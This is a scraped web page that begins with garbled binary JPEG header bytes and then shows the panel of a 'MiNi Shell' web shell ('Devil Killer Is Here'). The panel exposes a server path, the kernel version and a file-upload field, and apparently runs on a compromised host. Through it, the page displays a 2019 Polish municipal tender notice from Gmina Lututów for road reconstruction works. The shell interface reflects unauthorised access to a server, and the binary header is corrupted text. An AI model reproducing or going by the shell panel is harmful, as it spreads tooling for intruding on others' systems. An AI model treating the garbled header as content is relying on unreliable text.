JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190919/598913-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 598913-N-2019 z dnia 2019-09-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Lututów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">"PRZEBUDOWA I REMONT DRÓG NA TERENIE GMINY LUTUTÓW - 2019"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">"PRZEBUDOWA I REMONT DRÓG NA TERENIE GMINY LUTUTÓW - 2019"</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Tak</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Lututów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">73093434683000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Klonowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">98-360</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Lututów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łodzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">438 714 880</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">lesiewiczugl@op.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">438 714 052</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">bip.lututowgmina.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">bip.lututowgmina.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">bip.lututowgmina.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.lututowgmina.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Tak</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">LISTOWNIE, BĄDŹ OSOBIŚCIE NA ADRES SIEDZIBY URZĘDU GMINY W LUTUTOWIE, UL. KLONOWSKA 8, 98-360 LUTUTÓW</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Klonowska 8, 98-360 Lututów</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">"PRZEBUDOWA I REMONT DRÓG NA TERENIE GMINY LUTUTÓW - 2019"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IPB.7013.2.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> DOBROSŁAW: Przedmiotem wykonania zamówienia jest przebudowa drogi gminnej we wsi Dobrosław na działce 266 dł. 1000m. Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno - asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Projektowany odcinek posiada jedno załamanie w planie wyokrąglone łukiem kołowym z wszystkimi wymaganymi elementami obliczonymi na podstawie tablic do tyczenia łuków M. Lipińskiego i jedno załamanie nie wymagające wyokrąglenia łukiem kołowym. Istniejąca draga jest usytuowana na gruncie G1.Dla przebudowywanego odcinka projektuje się przekrój jezdni daszkowy szer. 4,0m o przechyłce poprzecznej 2 %. W km 0+549 zaprojektowano łuk kołowy o promieniu 600 m i przechyłce daszkowej 2%. Projektuje się od km 0+010 do km 1+000 wyrównanie profilu poprzecznego i podłużnego oraz wzmocnienie istniejącej nawierzchni optymalną mieszanką kruszywa łamanego frakcji 0-31,5 średniej grubości 10cm w ilości 396 m3 zagęszczoną do wskaźnika 1,0. Na odcinku od km 0+000 do km 0+010 należy rozebrać istniejącą nawierzchnię z kruszywa łamanego w celu nawiązania wysokościowego do nawierzchni drogi powiatowej, wykonać koryto, a w nim warstwę odcinającą z piasku gr. 10cm, podbudowę dolną z mieszanki kruszywa łamanego frakcji 0-63 gr. 15 cm i podbudowę górną z mieszanki kruszywa łamanego frakcji 0.31,5gr. 8 cm zagęszczone do wskaźnika 1,0 w ilości 49 m2. Pobocza szer. 1,5 m o przechyłce poprzecznej 8% należy utwardzić na szer. 0,75m od strony jezdni optymalną mieszanką kruszywa łamanego frakcji 0-63gr. 15 cm w ilości 1500,0 m2 zagęszczoną do wskaźnika 1,0 i na szer. 0,75 m uformować z gruntu dowiezionego z ukopu w ilości 150,0 m3 i zagęszczonego do wskaźnika 0,98. Kruszywo użyte do wyrównania profilu poprzecznego podbudowy i utwardzenia poboczy winno spełniać wymagania kategorii Gv w tabeli 6 normy PN-EN 13285 ( skała magmowa o dużej wytrzymałości). Na całej długości przebudowywanej drogi projektuje się nawierzchnię szer. 4,0 m jako warstwę ścieralną z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 grubości 4 cm o powierzchni 4009 m2. Wszystkie materiały użyte do budowy oraz sposób wykonania robót winny odpowiadać wymaganiom norm państwowych.HUTA-KOZUB I ETAP: Przedmiotem wykonania zamówienia jest przebudowa drogi gminnej Huta-Kozub w m. Huta na działce 160 dł. 1000m. Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną w części utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Projektowany odcinek posiada dwa załamania w planie wyokrąglone łukiem kołowym z wszystkimi wymaganymi elementami obliczonymi na podstawie tablic do liczenia łuków M . Lipińskiego i jedno załamanie nie wymagające wyokrąglenia łukiem kołowym. Istniejąca droga jest usytuowana na gruncie G1.Dla przebudowywanego odcinka od km 0+000d o km 1+000 projektuje się przekrój jezdni daszkowy szer. 4,0m o przechyłce poprzecznej 2 % . W km 0+617 zaprojektowano łuk kołowy o promieniu 40m i przechyłce jednostronnej 6% i w km 0+717 łuk kołowy o promieniu 120m i przechyłce jednostronnej 2%. Projektuje się od km 0+010 do km 1+000 wyrównanie profilu poprzecznego i podłużnego oraz wzmocnienie istniejącej nawierzchni optymalną mieszanką kruszywa łamanego frakcji 0.31,5 średniej grubości 10cm w-ilości 400,0 m3 zagęszczonego do wskaźnika 1,0. Na odcinku od km 0+000d o km 0+010 należy rozebrać istniejącą nawierzchnię z kruszywa łamanego w celu nawiązania wysokościowego do nawierzchni drogi powiatowej, wykonać koryto, a w nim warstwę odcinającą z piasku gr. 10 cm, podbudowę dolną z mieszani kruszywa łamanego frakcji 0-63 gr. 15cmi podbudowę górną z mieszanki kruszywa łamanego frakcji 0-31,5 gr. 8 cm zagęszczone do wskaźnika 1,0 w ilości 49 m2. Pobocza szer. 1,5 m o przechyłce poprzecznej 8% należy utwardzić na szer. 0,50 m od strony jezdni optymalną mieszanką kruszywa łamanego frakcji 0-63gr. 15 cm w ilości 1000,0 m2 zagęszczoną do wskaźnika 1,0 i na szer. 1,0 m uformować z gruntu dowiezionego z ukopu w ilości 194,12m3 i uzyskanego z wykopu na ciągu drogi w ilości 5,88 m3 zagęszczonego do wskaźnika 0,98. Kruszywo użyte do wyrównania profilu poprzecznego podbudowy i utwardzenia poboczy winno spełniać wymagania kategorii Gv w tabeli 6 normy PN-EN1 32B5 ( skała magmowa o dużej wytrzymałości ).Na całej długości przebudowywanej drogi projektuje się nawierzchnię szer. 4,0 m jako warstwę ścieralną mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 grubości 4 cm o powierzchni 4009 m2. Wszystkie materiały użyte do budowy oraz sposób wykonania robót winny odpowiadać wymaganiom norm państwowym.HUTA II ETAP: Przedmiotem wykonania zamówienia jest przebudowa drogi gminnej w miejscowości Huta na działkach 160 i 165 dł. 563m.Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Projektowany odcinek posiada jedno załamanie w planie wyokrąglone łukiem kołowym z wszystkimi wymaganymi elementami obliczonymi na podstawie tablic do tyczenia łuków M. Lipińskiego i dwa załamania nie wymagające wyokrąglenia łukiem kołowym. Dla przebudowywanego odcinka projektuje się przekrój jezdni daszkowy szer. 3,5m o przechyłce poprzecznej 2%. W km 0+272 zaprojektowano łuk kołowy o promieniu 13m i przechyłce jednostronnej 7%. Projektuje się od km 0+010 do 0+553 wyrównanie profilu poprzecznego i podłużnego oraz wzmocnienie istniejącej nawierzchni optymalną mieszanką kruszywa łamanego frakcji 0-31,5 średniej grubości 7 cm w ilości 137,94 m3 zagęszczona do wskaźnika 1,0. Na odcinku od km 0+000 do km 0+010 i od km 0+553 do km 0+563 należy rozebrać istniejącą nawierzchnię z kruszywa łamanego w celu nawiązania wysokościowego do nawierzchni istniejącej drogi, wykonać koryto a w nim warstwę odcinającą z piasku gr. 10cm, podbudowę dolną z mieszanki kruszywa łamanego frakcji 0-63 gr. 15cm i podbudowę górną z mieszanki kruszywa łamanego frakcji 0-31,5 gr. 8cm zagęszczone do wskaźnika 1,0 w ilości 70m2. Pobocza szer. 0,75m o przechyłce poprzecznej 8% należy utwardzić na szer. 0,50m od strony jezdni optymalną mieszanką kruszywa łamanego frakcji 0-63 gr. 15 cm w ilości 563,0m2 zagęszczoną do wskaźnika 1,0 i na szer. 0,25m uformować z gruntu dowiezionego z ukopu w ilości 22,56m3 i uzyskanego z wykopu na ciągu drogi w ilości 8,40m3 zagęszczonego do wskaźnika 0,98. Na łuku należy uformować przechyłkę jednostronną wielkości 7% z optymalnej mieszanki kruszywa łamanego frakcji 0-31,5 zagęszczonego do wskaźnika 1,0. Kruszywo użyte do wyrównania profilu poprzecznego, podbudowy i utwardzenia poboczy winno spełniać wymagania kategorii Gv w tabeli 6 normy PN-EN 13285 ( skała magmowa o dużej wytrzymałości). Na całej długości przebudowywanej drogi projektuje się nawierzchnię szer. 3,5m jako warstwę ścieralną z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 grubości 4cm o powierzchni 1970,5m2. Wszystkie materiały użyte do budowy oraz sposób wykonania robót winny odpowiadać wymaganiom norm państwowych.KOZUB: Przedmiotem wykonania zamówienia jest przebudowa drogi gminnej w miejscowości Kozub na działce 68/1 dł. 1000m. Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Projektowany odcinek posiada jedno załamanie w planie wyokrąglone łukiem kołowym z wszystkimi wymaganymi elementami obliczonymi na podstawie tablic do tyczenia łuków M. Lipińskiego. Dla przebudowywanego odcinka projektuje się przekrój jezdni daszkowy szer. 3,5m o przechyłce poprzecznej 2%. W km 0+030 zaprojektowano łuk kołowy o promieniu 43m i przechyłce jednostronnej 7%. Projektuje się od km 0+010 do km 0+990 wyrównanie profilu poprzecznego i podłużnego oraz wzmocnienie istniejącej nawierzchni optymalną mieszanką kruszywa łamanego frakcji 0-31,5 średniej grubości 7cm w ilości 240,1m3 zagęszczoną do wskaźnika 1,0. Na odcinku od km 0+000 do km 0+010 i od km 0+990 do km1+000 należy rozebrać istniejącą nawierzchnię z kruszywa łamanego w celu nawiązania wysokościowego do nawierzchni istniejącej drogi, wykonać koryto, a w nim warstwę odcinającą z piasku gr. 10cm, podbudowę dolną z mieszanki kruszywa łamanego frakcji 0-63 gr. 15cm i podbudowę górną z mieszanki kruszywa łamanego frakcji 0-31,5 gr. 8cm zagęszczone do wskaźnika 1,0 w ilości 70m2. Pobocza szer. 0,75m o przechyłce poprzecznej 8% należy utwardzić na szer. 0,50m od strony jezdni optymalną mieszanką kruszywa łamanego frakcji 0-663 gr. 15cm w ilości 1000,0m2 zagęszczoną do wskaźnika 1,0 i na szer. 0,25m uformować z gruntu dowiezionego z ukopu w ilości 46,6m3 i uzyskanego z wykopu na ciągu drogi w ilości 8,40m3 zagęszczonego do wskaźnika 0,98. Na łuku należy uformować przechyłkę jednostronną wielkości 7% z optymalnej mieszanki kruszywa łamanego frakcji 0-31,5 zagęszczonej do wskaźnika 1,0. Kruszywo użyte do wyrównania profilu poprzecznego, podbudowy i utwardzenia poboczy winno spełniać wymagania kategorii Gv w tabeli 6 normy PN-EN 13285 ( skała magmowa o dużej wytrzymałości). Na całej długości przebudowywanej drogi projektuje się nawierzchnię szer. 3,5m jako warstwę ścieralną z mieszanki mineralno-asfaltowej średnioziarnistej zamkniętej AC11S50/70 dla KR1 grubości 4cm o powierzchni 3500,0m2. Wszystkie materiały użyte do budowy oraz sposób wykonania robót winny odpowiadać wymaganiom norm państwowych.DĘBINA-LUTUTÓW: Przedmiotem wykonania zamówienia jest remont-przebudowa drogi gminnej Dębina-Lututów na działkach 37, 221/1 i 221/3 o długości 900m. Projektowany odcinek rozpoczyna się w km 0+000 na krawędzi jezdni bitumicznej wcześniej wykonanego odcinka drogi gminnej na tym samym ciągu jako zjazdu z drogi krajowej, a kończy się w km 0+900. Cały odcinek projektowanej przebudowy przebiega w terenie równinnym. Wykonanie robót budowlanych polegać będzie na robotach związanych z wyrównaniem poprzecznym i podłużnym oraz wzmocnieniem istniejącej nawierzchni optymalną mieszanką kruszywa łamanego i wykonaniem warstwy ścieralnej z mieszanki mineralno- asfaltowej średnioziarnistej zamkniętej. Pobocza zostaną utwardzone kruszywem i uformowane z gruntu dowiezionego z ukopu. Projektowany odcinek posiada siedem załamań w planie nie wymagających wyokrąglenia łukiem kołowym. Dla przebudowywanego odcinka od km 0+000 do 0+900 projektuje się przekrój jezdni daszkowy szer. 3,0m o przechyłce poprzecznej 2%. Projektuje się 